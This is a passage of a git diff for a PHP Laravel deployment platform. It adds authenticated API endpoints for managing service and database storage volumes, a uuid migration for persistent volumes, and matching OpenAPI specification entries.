+            ['bearerAuth' => []],
+        ],
+        tags: ['Databases'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the database.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+            new OA\Parameter(
+                name: 'storage_uuid',
+                in: 'path',
+                description: 'UUID of the storage.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+        ],
+        responses: [
+            new OA\Response(response: 200, description: 'Storage deleted.', content: new OA\JsonContent(
+                properties: [new OA\Property(property: 'message', type: 'string')],
+            )),
+            new OA\Response(response: 401, ref: '#/components/responses/401'),
+            new OA\Response(response: 400, ref: '#/components/responses/400'),
+            new OA\Response(response: 404, ref: '#/components/responses/404'),
+            new OA\Response(response: 422, ref: '#/components/responses/422'),
+        ]
+    )]
+    public function delete_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $database = queryDatabaseByUuidWithinTeam($request->uuid, $teamId);
+        if (! $database) {
+            return response()->json(['message' => 'Database not found.'], 404);
+        }
+
+        $this->authorize('update', $database);
+
+        $storageUuid = $request->route('storage_uuid');
+
+        $storage = $database->persistentStorages->where('uuid', $storageUuid)->first();
+        if (! $storage) {
+            $storage = $database->fileStorages->where('uuid', $storageUuid)->first();
+        }
+
+        if (! $storage) {
+            return response()->json(['message' => 'Storage not found.'], 404);
+        }
+
+        if ($storage->shouldBeReadOnlyInUI()) {
+            return response()->json([
+                'message' => 'This storage is read-only (managed by docker-compose or service definition) and cannot be deleted.',
+            ], 422);
+        }
+
+        if ($storage instanceof LocalFileVolume) {
+            $storage->deleteStorageOnServer();
+        }
+
+        $storage->delete();
+
+        return response()->json(['message' => 'Storage deleted.']);
+    }
 }
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index 4caee26dd..ca565ece0 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -8,9 +8,12 @@
 use App\Http\Controllers\Controller;
 use App\Jobs\DeleteResourceJob;
 use App\Models\EnvironmentVariable;
+use App\Models\LocalFileVolume;
+use App\Models\LocalPersistentVolume;
 use App\Models\Project;
 use App\Models\Server;
 use App\Models\Service;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Validator;
 use OpenApi\Attributes as OA;
@@ -1849,4 +1852,606 @@ public function action_restart(Request $request)
             200
         );
     }
+
+    #[OA\Get(
+        summary: 'List Storages',
+        description: 'List all persistent storages and file storages by service UUID.',
+        path: '/services/{uuid}/storages',
+        operationId: 'list-storages-by-service-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Services'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the service.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'All storages by service UUID.',
+                content: new OA\JsonContent(
+                    properties: [
+                        new OA\Property(property: 'persistent_storages', type: 'array', items: new OA\Items(type: 'object')),
+                        new OA\Property(property: 'file_storages', type: 'array', items: new OA\Items(type: 'object')),
+                    ],
+                ),
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+        ]
+    )]
+    public function storages(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+
+        if (! $service) {
+            return response()->json([
+                'message' => 'Service not found.',
+            ], 404);
+        }
+
+        $this->authorize('view', $service);
+
+        $persistentStorages = collect();
+        $fileStorages = collect();
+
+        foreach ($service->applications as $app) {
+            $persistentStorages = $persistentStorages->merge(
+                $app->persistentStorages->map(fn ($s) => $s->setAttribute('resource_uuid', $app->uuid)->setAttribute('resource_type', 'application'))
+            );
+            $fileStorages = $fileStorages->merge(
+                $app->fileStorages->map(fn ($s) => $s->setAttribute('resource_uuid', $app->uuid)->setAttribute('resource_type', 'application'))
+            );
+        }
+        foreach ($service->databases as $db) {
+            $persistentStorages = $persistentStorages->merge(
+                $db->persistentStorages->map(fn ($s) => $s->setAttribute('resource_uuid', $db->uuid)->setAttribute('resource_type', 'database'))
+            );
+            $fileStorages = $fileStorages->merge(
+                $db->fileStorages->map(fn ($s) => $s->setAttribute('resource_uuid', $db->uuid)->setAttribute('resource_type', 'database'))
+            );
+        }
+
+        return response()->json([
+            'persistent_storages' => $persistentStorages->sortBy('id')->values(),
+            'file_storages' => $fileStorages->sortBy('id')->values(),
+        ]);
+    }
+
+    #[OA\Post(
+        summary: 'Create Storage',
+        description: 'Create a persistent storage or file storage for a service sub-resource.',
+        path: '/services/{uuid}/storages',
+        operationId: 'create-storage-by-service-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Services'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the service.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['type', 'mount_path', 'resource_uuid'],
+                        properties: [
+                            'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage.'],
+                            'resource_uuid' => ['type' => 'string', 'description' => 'UUID of the service application or database sub-resource.'],
+                            'name' => ['type' => 'string', 'description' => 'Volume name (persistent only, required for persistent).'],
+                            'mount_path' => ['type' => 'string', 'description' => 'The container mount path.'],
+                            'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, optional).'],
+                            'content' => ['type' => 'string', 'nullable' => true, 'description' => 'File content (file only, optional).'],
+                            'is_directory' => ['type' => 'boolean', 'description' => 'Whether this is a directory mount (file only, default false).'],
+                            'fs_path' => ['type' => 'string', 'description' => 'Host directory path (required when is_directory is true).'],
+                        ],
+                        additionalProperties: false,
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 201,
+                description: 'Storage created.',
+                content: new OA\JsonContent(type: 'object'),
+            ),
+            new OA\Response(response: 401, ref: '#/components/responses/401'),
+            new OA\Response(response: 400, ref: '#/components/responses/400'),
+            new OA\Response(response: 404, ref: '#/components/responses/404'),
+            new OA\Response(response: 422, ref: '#/components/responses/422'),
+        ]
+    )]
+    public function create_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $return = validateIncomingRequest($request);
+        if ($return instanceof JsonResponse) {
+            return $return;
+        }
+
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+        if (! $service) {
+            return response()->json(['message' => 'Service not found.'], 404);
+        }
+
+        $this->authorize('update', $service);
+
+        $validator = customApiValidator($request->all(), [
+            'type' => 'required|string|in:persistent,file',
+            'resource_uuid' => 'required|string',
+            'name' => 'string',
+            'mount_path' => 'required|string',
+            'host_path' => 'string|nullable',
+            'content' => 'string|nullable',
+            'is_directory' => 'boolean',
+            'fs_path' => 'string',
+        ]);
+
+        $allAllowedFields = ['type', 'resource_uuid', 'name', 'mount_path', 'host_path', 'content', 'is_directory', 'fs_path'];
+        $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
+        if ($validator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors();
+            if (! empty($extraFields)) {
+                foreach ($extraFields as $field) {
+                    $errors->add($field, 'This field is not allowed.');
+                }
+            }
+
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $errors,
+            ], 422);
+        }
+
+        $subResource = $service->applications()->where('uuid', $request->resource_uuid)->first();
+        if (! $subResource) {
+            $subResource = $service->databases()->where('uuid', $request->resource_uuid)->first();
+        }
+        if (! $subResource) {
+            return response()->json(['message' => 'Service resource not found.'], 404);
+        }
+
+        if ($request->type === 'persistent') {
+            if (! $request->name) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['name' => 'The name field is required for persistent storages.'],
+                ], 422);
+            }
+
+            $typeSpecificInvalidFields = array_intersect(['content', 'is_directory', 'fs_path'], array_keys($request->all()));
+            if (! empty($typeSpecificInvalidFields)) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => collect($typeSpecificInvalidFields)
+                        ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type 'persistent'."]),
+                ], 422);
+            }
+
+            $storage = LocalPersistentVolume::create([
+                'name' => $subResource->uuid.'-'.$request->name,
+                'mount_path' => $request->mount_path,
+                'host_path' => $request->host_path,
+                'resource_id' => $subResource->id,
+                'resource_type' => $subResource->getMorphClass(),
+            ]);
+
+            return response()->json($storage, 201);
+        }
+
+        // File storage
+        $typeSpecificInvalidFields = array_intersect(['name', 'host_path'], array_keys($request->all()));
+        if (! empty($typeSpecificInvalidFields)) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => collect($typeSpecificInvalidFields)
+                    ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type 'file'."]),
+            ], 422);
+        }
+
+        $isDirectory = $request->boolean('is_directory', false);
+
+        if ($isDirectory) {
+            if (! $request->fs_path) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => ['fs_path' => 'The fs_path field is required for directory mounts.'],
+                ], 422);
+            }
+
+            $fsPath = str($request->fs_path)->trim()->start('/')->value();
+            $mountPath = str($request->mount_path)->trim()->start('/')->value();
+
+            validateShellSafePath($fsPath, 'storage source path');
+            validateShellSafePath($mountPath, 'storage destination path');
+
+            $storage = LocalFileVolume::create([
+                'fs_path' => $fsPath,
+                'mount_path' => $mountPath,
+                'is_directory' => true,
+                'resource_id' => $subResource->id,
+                'resource_type' => get_class($subResource),
+            ]);
+        } else {
+            $mountPath = str($request->mount_path)->trim()->start('/')->value();
+            $fsPath = service_configuration_dir().'/'.$service->uuid.$mountPath;
+
+            $storage = LocalFileVolume::create([
+                'fs_path' => $fsPath,
+                'mount_path' => $mountPath,
+                'content' => $request->content,
+                'is_directory' => false,
+                'resource_id' => $subResource->id,
+                'resource_type' => get_class($subResource),
+            ]);
+        }
+
+        return response()->json($storage, 201);
+    }
+
+    #[OA\Patch(
+        summary: 'Update Storage',
+        description: 'Update a persistent storage or file storage by service UUID.',
+        path: '/services/{uuid}/storages',
+        operationId: 'update-storage-by-service-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Services'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the service.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            description: 'Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.',
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['type'],
+                        properties: [
+                            'uuid' => ['type' => 'string', 'description' => 'The UUID of the storage (preferred).'],
+                            'id' => ['type' => 'integer', 'description' => 'The ID of the storage (deprecated, use uuid instead).'],
+                            'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage: persistent or file.'],
+                            'is_preview_suffix_enabled' => ['type' => 'boolean', 'description' => 'Whether to add -pr-N suffix for preview deployments.'],
+                            'name' => ['type' => 'string', 'description' => 'The volume name (persistent only, not allowed for read-only storages).'],
+                            'mount_path' => ['type' => 'string', 'description' => 'The container mount path (not allowed for read-only storages).'],
+                            'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, not allowed for read-only storages).'],
+                            'content' => ['type' => 'string', 'nullable' => true, 'description' => 'The file content (file only, not allowed for read-only storages).'],
+                        ],
+                        additionalProperties: false,
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'Storage updated.',
+                content: new OA\JsonContent(type: 'object'),
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+            new OA\Response(
+                response: 422,
+                ref: '#/components/responses/422',
+            ),
+        ]
+    )]
+    public function update_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $return = validateIncomingRequest($request);
+        if ($return instanceof JsonResponse) {
+            return $return;
+        }
+
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->route('uuid'))->first();
+
+        if (! $service) {
+            return response()->json([
+                'message' => 'Service not found.',
+            ], 404);
+        }
+
+        $this->authorize('update', $service);
+
+        $validator = customApiValidator($request->all(), [
+            'uuid' => 'string',
+            'id' => 'integer',
+            'type' => 'required|string|in:persistent,file',
+            'is_preview_suffix_enabled' => 'boolean',
+            'name' => 'string',
+            'mount_path' => 'string',
+            'host_path' => 'string|nullable',
+            'content' => 'string|nullable',
+        ]);
+
+        $allAllowedFields = ['uuid', 'id', 'type', 'is_preview_suffix_enabled', 'name', 'mount_path', 'host_path', 'content'];
+        $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
+        if ($validator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors();
+            if (! empty($extraFields)) {
+                foreach ($extraFields as $field) {
+                    $errors->add($field, 'This field is not allowed.');
+                }
+            }
+
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $errors,
+            ], 422);
+        }
+
+        $storageUuid = $request->input('uuid');
+        $storageId = $request->input('id');
+
+        if (! $storageUuid && ! $storageId) {
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => ['uuid' => 'Either uuid or id is required.'],
+            ], 422);
+        }
+
+        $lookupField = $storageUuid ? 'uuid' : 'id';
+        $lookupValue = $storageUuid ?? $storageId;
+
+        $storage = null;
+        if ($request->type === 'persistent') {
+            foreach ($service->applications as $app) {
+                $storage = $app->persistentStorages->where($lookupField, $lookupValue)->first();
+                if ($storage) {
+                    break;
+                }
+            }
+            if (! $storage) {
+                foreach ($service->databases as $db) {
+                    $storage = $db->persistentStorages->where($lookupField, $lookupValue)->first();
+                    if ($storage) {
+                        break;
+                    }
+                }
+            }
+        } else {
+            foreach ($service->applications as $app) {
+                $storage = $app->fileStorages->where($lookupField, $lookupValue)->first();
+                if ($storage) {
+                    break;
+                }
+            }
+            if (! $storage) {
+                foreach ($service->databases as $db) {
+                    $storage = $db->fileStorages->where($lookupField, $lookupValue)->first();
+                    if ($storage) {
+                        break;
+                    }
+                }
+            }
+        }
+
+        if (! $storage) {
+            return response()->json([
+                'message' => 'Storage not found.',
+            ], 404);
+        }
+
+        $isReadOnly = $storage->shouldBeReadOnlyInUI();
+        $editableOnlyFields = ['name', 'mount_path', 'host_path', 'content'];
+        $requestedEditableFields = array_intersect($editableOnlyFields, array_keys($request->all()));
+
+        if ($isReadOnly && ! empty($requestedEditableFields)) {
+            return response()->json([
+                'message' => 'This storage is read-only (managed by docker-compose or service definition). Only is_preview_suffix_enabled can be updated.',
+                'read_only_fields' => array_values($requestedEditableFields),
+            ], 422);
+        }
+
+        // Reject fields that don't apply to the given storage type
+        if (! $isReadOnly) {
+            $typeSpecificInvalidFields = $request->type === 'persistent'
+                ? array_intersect(['content'], array_keys($request->all()))
+                : array_intersect(['name', 'host_path'], array_keys($request->all()));
+
+            if (! empty($typeSpecificInvalidFields)) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => collect($typeSpecificInvalidFields)
+                        ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type '{$request->type}'."]),
+                ], 422);
+            }
+        }
+
+        // Always allowed
+        if ($request->has('is_preview_suffix_enabled')) {
+            $storage->is_preview_suffix_enabled = $request->is_preview_suffix_enabled;
+        }
+
+        // Only for editable storages
+        if (! $isReadOnly) {
+            if ($request->type === 'persistent') {
+                if ($request->has('name')) {
+                    $storage->name = $request->name;
+                }
+                if ($request->has('mount_path')) {
+                    $storage->mount_path = $request->mount_path;
+                }
+                if ($request->has('host_path')) {
+                    $storage->host_path = $request->host_path;
+                }
+            } else {
+                if ($request->has('mount_path')) {
+                    $storage->mount_path = $request->mount_path;
+                }
+                if ($request->has('content')) {
+                    $storage->content = $request->content;
+                }
+            }
+        }
+
+        $storage->save();
+
+        return response()->json($storage);
+    }
+
+    #[OA\Delete(
+        summary: 'Delete Storage',
+        description: 'Delete a persistent storage or file storage by service UUID.',
+        path: '/services/{uuid}/storages/{storage_uuid}',
+        operationId: 'delete-storage-by-service-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Services'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the service.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+            new OA\Parameter(
+                name: 'storage_uuid',
+                in: 'path',
+                description: 'UUID of the storage.',
+                required: true,
+                schema: new OA\Schema(type: 'string')
+            ),
+        ],
+        responses: [
+            new OA\Response(response: 200, description: 'Storage deleted.', content: new OA\JsonContent(
+                properties: [new OA\Property(property: 'message', type: 'string')],
+            )),
+            new OA\Response(response: 401, ref: '#/components/responses/401'),
+            new OA\Response(response: 400, ref: '#/components/responses/400'),
+            new OA\Response(response: 404, ref: '#/components/responses/404'),
+            new OA\Response(response: 422, ref: '#/components/responses/422'),
+        ]
+    )]
+    public function delete_storage(Request $request): JsonResponse
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+        if (! $service) {
+            return response()->json(['message' => 'Service not found.'], 404);
+        }
+
+        $this->authorize('update', $service);
+
+        $storageUuid = $request->route('storage_uuid');
+
+        $storage = null;
+        foreach ($service->applications as $app) {
+            $storage = $app->persistentStorages->where('uuid', $storageUuid)->first();
+            if ($storage) {
+                break;
+            }
+        }
+        if (! $storage) {
+            foreach ($service->databases as $db) {
+                $storage = $db->persistentStorages->where('uuid', $storageUuid)->first();
+                if ($storage) {
+                    break;
+                }
+            }
+        }
+        if (! $storage) {
+            foreach ($service->applications as $app) {
+                $storage = $app->fileStorages->where('uuid', $storageUuid)->first();
+                if ($storage) {
+                    break;
+                }
+            }
+        }
+        if (! $storage) {
+            foreach ($service->databases as $db) {
+                $storage = $db->fileStorages->where('uuid', $storageUuid)->first();
+                if ($storage) {
+                    break;
+                }
+            }
+        }
+
+        if (! $storage) {
+            return response()->json(['message' => 'Storage not found.'], 404);
+        }
+
+        if ($storage->shouldBeReadOnlyInUI()) {
+            return response()->json([
+                'message' => 'This storage is read-only (managed by docker-compose or service definition) and cannot be deleted.',
+            ], 422);
+        }
+
+        if ($storage instanceof LocalFileVolume) {
+            $storage->deleteStorageOnServer();
+        }
+
+        $storage->delete();
+
+        return response()->json(['message' => 'Storage deleted.']);
+    }
 }
diff --git a/app/Models/LocalPersistentVolume.php b/app/Models/LocalPersistentVolume.php
index 1721f4afe..9d539f8ec 100644
--- a/app/Models/LocalPersistentVolume.php
+++ b/app/Models/LocalPersistentVolume.php
@@ -3,10 +3,9 @@
 namespace App\Models;
 
 use Illuminate\Database\Eloquent\Casts\Attribute;
-use Illuminate\Database\Eloquent\Model;
 use Symfony\Component\Yaml\Yaml;
 
-class LocalPersistentVolume extends Model
+class LocalPersistentVolume extends BaseModel
 {
     protected $guarded = [];
 
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index 26aa21a7b..ce9ab5283 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -339,7 +339,9 @@ function generate_application_name(string $git_repository, string $git_branch, ?
         $cuid = new Cuid2;
     }
 
-    return Str::kebab("$git_repository:$git_branch-$cuid");
+    $repo_name = str_contains($git_repository, '/') ? last(explode('/', $git_repository)) : $git_repository;
+
+    return Str::kebab("$repo_name:$git_branch-$cuid");
 }
 
 /**
diff --git a/database/migrations/2026_03_23_101720_add_uuid_to_local_persistent_volumes_table.php b/database/migrations/2026_03_23_101720_add_uuid_to_local_persistent_volumes_table.php
new file mode 100644
index 000000000..6b4fb690d
--- /dev/null
+++ b/database/migrations/2026_03_23_101720_add_uuid_to_local_persistent_volumes_table.php
@@ -0,0 +1,39 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\Schema;
+use Visus\Cuid2\Cuid2;
+
+return new class extends Migration
+{
+    public function up(): void
+    {
+        Schema::table('local_persistent_volumes', function (Blueprint $table) {
+            $table->string('uuid')->nullable()->after('id');
+        });
+
+        DB::table('local_persistent_volumes')
+            ->whereNull('uuid')
+            ->orderBy('id')
+            ->chunk(1000, function ($volumes) {
+                foreach ($volumes as $volume) {
+                    DB::table('local_persistent_volumes')
+                        ->where('id', $volume->id)
+                        ->update(['uuid' => (string) new Cuid2]);
+                }
+            });
+
+        Schema::table('local_persistent_volumes', function (Blueprint $table) {
+            $table->string('uuid')->nullable(false)->unique()->change();
+        });
+    }
+
+    public function down(): void
+    {
+        Schema::table('local_persistent_volumes', function (Blueprint $table) {
+            $table->dropColumn('uuid');
+        });
+    }
+};
diff --git a/openapi.json b/openapi.json
index d119176a1..aec5a2843 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3502,6 +3502,105 @@
                     }
                 ]
             },
+            "post": {
+                "tags": [
+                    "Applications"
+                ],
+                "summary": "Create Storage",
+                "description": "Create a persistent storage or file storage for an application.",
+                "operationId": "create-storage-by-application-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the application.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "type",
+                                    "mount_path"
+                                ],
+                                "properties": {
+                                    "type": {
+                                        "type": "string",
+                                        "enum": [
+                                            "persistent",
+                                            "file"
+                                        ],
+                                        "description": "The type of storage."
+                                    },
+                                    "name": {
+                                        "type": "string",
+                                        "description": "Volume name (persistent only, required for persistent)."
+                                    },
+                                    "mount_path": {
+                                        "type": "string",
+                                        "description": "The container mount path."
+                                    },
+                                    "host_path": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The host path (persistent only, optional)."
+                                    },
+                                    "content": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "File content (file only, optional)."
+                                    },
+                                    "is_directory": {
+                                        "type": "boolean",
+                                        "description": "Whether this is a directory mount (file only, default false)."
+                                    },
+                                    "fs_path": {
+                                        "type": "string",
+                                        "description": "Host directory path (required when is_directory is true)."
+                                    }
+                                },
+                                "type": "object",
+                                "additionalProperties": false
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "201": {
+                        "description": "Storage created.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
             "patch": {
                 "tags": [
                     "Applications"
@@ -3527,13 +3626,16 @@
                         "application\/json": {
                             "schema": {
                                 "required": [
-                                    "id",
                                     "type"
                                 ],
                                 "properties": {
+                                    "uuid": {
+                                        "type": "string",
+                                        "description": "The UUID of the storage (preferred)."
+                                    },
                                     "id": {
                                         "type": "integer",
-                                        "description": "The ID of the storage."
+                                        "description": "The ID of the storage (deprecated, use uuid instead)."
                                     },
                                     "type": {
                                         "type": "string",
@@ -3603,6 +3705,70 @@
                 ]
             }
         },
+        "\/applications\/{uuid}\/storages\/{storage_uuid}": {
+            "delete": {
+                "tags": [
+                    "Applications"
+                ],
+                "summary": "Delete Storage",
+                "description": "Delete a persistent storage or file storage by application UUID.",
+                "operationId": "delete-storage-by-application-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the application.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    },
+                    {
+                        "name": "storage_uuid",
+                        "in": "path",
+                        "description": "UUID of the storage.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "Storage deleted.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "message": {
+                                            "type": "string"
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
         "\/cloud-tokens": {
             "get": {
                 "tags": [
@@ -6513,6 +6679,333 @@
                 ]
             }
         },
+        "\/databases\/{uuid}\/storages": {
+            "get": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "List Storages",
+                "description": "List all persistent storages and file storages by database UUID.",
+                "operationId": "list-storages-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "All storages by database UUID.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "persistent_storages": {
+                                            "type": "array",
+                                            "items": {
+                                                "type": "object"
+                                            }
+                                        },
+                                        "file_storages": {
+                                            "type": "array",
+                                            "items": {
+                                                "type": "object"
+                                            }
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "post": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Create Storage",
+                "description": "Create a persistent storage or file storage for a database.",
+                "operationId": "create-storage-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "type",
+                                    "mount_path"
+                                ],
+                                "properties": {
+                                    "type": {
+                                        "type": "string",
+                                        "enum": [
+                                            "persistent",
+                                            "file"
+                                        ],
+                                        "description": "The type of storage."
+                                    },
+                                    "name": {
+                                        "type": "string",
+                                        "description": "Volume name (persistent only, required for persistent)."
+                                    },
+                                    "mount_path": {
+                                        "type": "string",
+                                        "description": "The container mount path."
+                                    },
+                                    "host_path": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The host path (persistent only, optional)."
+                                    },
+                                    "content": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "File content (file only, optional)."
+                                    },
+                                    "is_directory": {
+                                        "type": "boolean",
+                                        "description": "Whether this is a directory mount (file only, default false)."
+                                    },
+                                    "fs_path": {
+                                        "type": "string",
+                                        "description": "Host directory path (required when is_directory is true)."
+                                    }
+                                },
+                                "type": "object",
+                                "additionalProperties": false
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "201": {
+                        "description": "Storage created.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "object"
+                                }
+                            }
+                        }
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "patch": {
+                "tags": [
+                    "Databases"
+                ],
+                "summary": "Update Storage",
+                "description": "Update a persistent storage or file storage by database UUID.",
+                "operationId": "update-storage-by-database-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the database.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "description": "Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.",
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "type"
+                                ],
+                                "properties": {
+                                    "uuid": {
+                                        "type": "string",
+                                        "description": "The UUID of the storage (preferred)."
+                                    },
+                                    "id": {
